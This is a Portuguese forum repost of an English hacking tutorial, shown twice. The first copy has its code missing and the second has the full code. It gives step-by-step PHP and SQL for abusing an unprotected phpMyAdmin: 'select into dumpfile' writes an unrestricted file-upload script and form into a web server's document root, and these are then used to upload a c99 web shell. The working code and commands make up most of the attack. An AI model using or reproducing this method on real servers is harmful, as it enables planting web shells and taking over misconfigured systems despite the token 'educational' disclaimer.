O tutorial não é de minha autoria, porém deixo ai pro pessoal do GH, apesar de inglês, está de fácil entendimento, testei aqui em localhost e está funcionando perfeitamente.
--------------------------------------------------------------------------------------------------------------------------------------------------
Hello and Greetz to all SO members once again.
Today i thought of writing a tutorial,which some of you might know it well before. I usually tested in my local machine ,with
Xampp version 1.7.2 which is freely available.
With Xampp ,we have phpmyadmin ,which everybody knows thats it is an open source tool written in PHP intended to handle the
administration of MySQL.
Objective : To upload any shell by using phpmyadmin.
So here it goes how i started :
Step 1: We have to create two php files ,one for upload and the other is the userform.
code => upload.php
code => form.php
Step 2: We must find our document root ,this can be found on "http://localhost/xampp/phpinfo.php",of xampp or creating a simple code with php.
i saw mine to be C:/xampp/htdocs/ . it can be different according to installation directory.
Step 3: Create the database by any name ,i name it as 'evildb' in pma.
Step 4: Create two tables name it as userform with one field name 'track1' and the other user_upload with one field name 'track2' ,in the pma.
SQL CODE:
SQL CODE:
Step 5 : Select the sql tab and execute the userform code from above as shown below under the table name 'userform'
SQL CODE:
SQL CODE:
It will successfully create form.php on the document root.
Step 6: Select the sql tab and execute the upload.php code from above as shown below under the table name 'user_upload'.
SQL CODE:
SQL CODE:
it will successfully create upload.php on the document root.
Step 7: Now lets execute the form from the document root (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).
Final Step 8: Now we can upload any shell as required , i uploaded c99 and tested.
Note : This could be vulnerable to some webservers where phpmyadmin is not password protected.
Warning : This is used for only educational purpose.
Hope it might be useful for some users. :P
Crédits: securityoverride.com
--------------------------------------------------------------------------------------------------------------------------------------------------
Hello and Greetz to all SO members once again.
Today i thought of writing a tutorial,which some of you might know it well before. I usually tested in my local machine ,with
Xampp version 1.7.2 which is freely available.
With Xampp ,we have phpmyadmin ,which everybody knows thats it is an open source tool written in PHP intended to handle the
administration of MySQL.
Objective : To upload any shell by using phpmyadmin.
So here it goes how i started :
Step 1: We have to create two php files ,one for upload and the other is the userform.
code => upload.php
Código:
<?php $uploaddir = 'C:/xampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000>Evil Uploaded successfully !! </font></body>'; } else { print '<body bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000> Evil Uploaded Failed !!</font></body>'; } ?>
Código:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> > <head> Evil Z0ne </head> <body bgcolor="#000000"> <div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px; ">>> Evil Upload !!! </div> <div style="padding-top:75px;margin-left:450px;width:340px; height:70px;"> <form enctype="multipart/form-data" action="upload.php" method="post"> <input name="userfile" type="file" /> <input type="submit" value="Upload" /> </form> </div> </body> </html>
Step 2: We must find our document root ,this can be found on "http://localhost/xampp/phpinfo.php",of xampp or creating a simple code with php.
Código:
<?php phpinfo();?>
i saw mine to be C:/xampp/htdocs/ . it can be different according to installation directory.
Step 3: Create the database by any name ,i name it as 'evildb' in pma.
Step 4: Create two tables name it as userform with one field name 'track1' and the other user_upload with one field name 'track2' ,in the pma.
SQL CODE:
Código:
CREATE TABLE `evildb`.`userform` ( `track1` VARCHAR( 1000 ) NOT NULL ) ENGINE = MYISAM ;
SQL CODE:
Código:
CREATE TABLE `evildb`.`user_upload` ( `track2` VARCHAR( 1000 ) NOT NULL ) ENGINE = MYISAM ;
SQL CODE:
Código:
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> > <head> Evil Z0ne </head> <body bgcolor="#000000"> <div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px; ">>> Evil Upload !!! </div> <div style="padding-top:75px;margin-left:450px;width:340px; height:70px;"> <form enctype="multipart/form-data" action="upload.php" method="post"> <input name="userfile" type="file" /> <input type="submit" value="Upload" /> </form> </div> </body> </html>');
SQL CODE:
Código:
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform
Step 6: Select the sql tab and execute the upload.php code from above as shown below under the table name 'user_upload'.
SQL CODE:
Código:
INSERT INTO user_upload VALUES ( "<?php $uploaddir = 'C:/xampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000>Evil Uploaded successfully !!</font></body>'; } else { print '<body bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000> Evil Uploaded Failed !!</font></body>'; } ?> " );
SQL CODE:
Código:
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload
Step 7: Now lets execute the form from the document root (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).
Final Step 8: Now we can upload any shell as required , i uploaded c99 and tested.
Note : This could be vulnerable to some webservers where phpmyadmin is not password protected.
Warning : This is used for only educational purpose.
Hope it might be useful for some users. :P
Crédits: securityoverride.com
Comment